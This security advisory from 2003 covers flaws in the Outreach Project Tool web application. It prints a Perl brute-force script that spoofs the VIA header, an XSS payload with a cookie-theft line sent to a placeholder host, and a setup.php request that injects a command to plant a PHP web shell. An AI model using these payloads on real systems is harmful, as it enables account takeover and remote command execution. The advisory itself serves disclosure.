20th Jan 2003 [SBWID-5935]
COMMAND
	Outreach Project Tool issues
SYSTEMS AFFECTED
	O.P.T Version opt_0.946b / Earlier versions may be vulnerable too
PROBLEM
	In  an  advisory  by  Martin  Eiszner  [[email protected]]  of   WebSec.org
	[http://www.websec.org] :
	The Outreach Project Tool was developed by CSO Lanifex GmbH  to  support
	communication with customers during  project  implementat  ion.  It  has
	rapidly evolved into a highly effective Web-based collaboration  system,
	which improves interaction between consult ants and  their  clients,  as
	well as a wide range of other applications.
	--snip--
	
	 1) REQUEST-HEADER TARPIT - OUT-CHEAT
	
	The      function      "OPT_remote_IP()"(/opt/general.php)       accepts
	"X_FORWARDED_FOR" and "VIA"- environment variables.
	This is done to identify  possible  proxy-servers.  Unfortunately  these
	variables are part of the HTTP-request headers.
	the follwoing http-request:
	
	---*---
	GET /opt/whatever HTTP/1.1
	Host: whatever
	VIA: 1.2.3.4
	---*---
	
	"$HTTP_VIA" will be used as the users IP.
	Thus leading to:
	 -Anonymous use of the application
	 -Possibility of a brute-force attack against accounts
	Simple example for a brute-force attack against OPT:
	
	---cut here---
	#!/usr/bin/perl
	use LWP::UserAgent;
	use HTTP::Request::Common;
	use HTTP::Response;
	my ($url,$uid,$pf) = @ARGV;
	open(P,"< $pf") || die "passf.?\n";
	my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
	while(<P>){ my $pwd = $_; chomp($pwd);
	my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
	my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
	my $hds = $res->headers; my $new = $hds->header("Location");
	my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
	my $cod = $res2->code;
	my $pag = $res2->content;
	print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
	close (P);
	---cut here---
	
	
	 2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
	
	Typical   XSS   vulnerabilities   exist    in    manny/most    of    the
	community-functions.
	Example:
	Once logged in ... goto "Notes -> News -> Ad News" Then  create  a  News
	with scripting tags included:
	
	---cut here---
	hello i am a news thing .. bla bla ...
	<script> alert(document.cookie); </script>
	---cut here---
	
	Now every user gets now an alert window with  his  own  session-id.(only
	as example!!)
	Of course it is possible to steal the OPT_Session by requesting  another
	url where a so called cookie-theft is installed !!
	
	(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
	
	This vulnerability makes it possible  once  logged  in  to  steal  "any"
	other users accounts (administrator included !).
	
	 3) SETUP-ISSUES (/opt/setup)
	
	If the lockfile "lock01" in the setup_lock-directory is not removed  due
	to wrong permission settings or someone  is  able/allowed  to  create  a
	file "lock01" it is possible to:
	
	a) Create a new Setup
	b) Execute system-commands thru the setup.php - script.
	
	This is because the "temp_CRM_dir" parameter is passed directly  to  the
	PHP-exec function.
	Example GET-Request:
	
	---cut here---
	http://localhost/opt/setup/setup.php?
	CRM_email=opti@localhost
	&CRM_system_email=mei@localhost
	&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
	&CRM_db_host=localhost&CRM_db_uname=opt
	&CRM_db_pwd=opt
	&CRM_db_db=opt
	&CRM_may_demo=0
	&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
	&CRM_mail_fname=OPT_incoming_mail
	&action=Set up my OPT server
	---cut here---
	
	Above    will    create    a    script     called     "bad.php"     with
	content(<?passthru($c)?>)in the OPT-setup directory !
SOLUTION
	After    installation    check    if    file    "lock01"    exists    in
	setup_lock-directory. if yes, remove it.
	The other vulnerabilities can only be fixed by sw-patches. (?)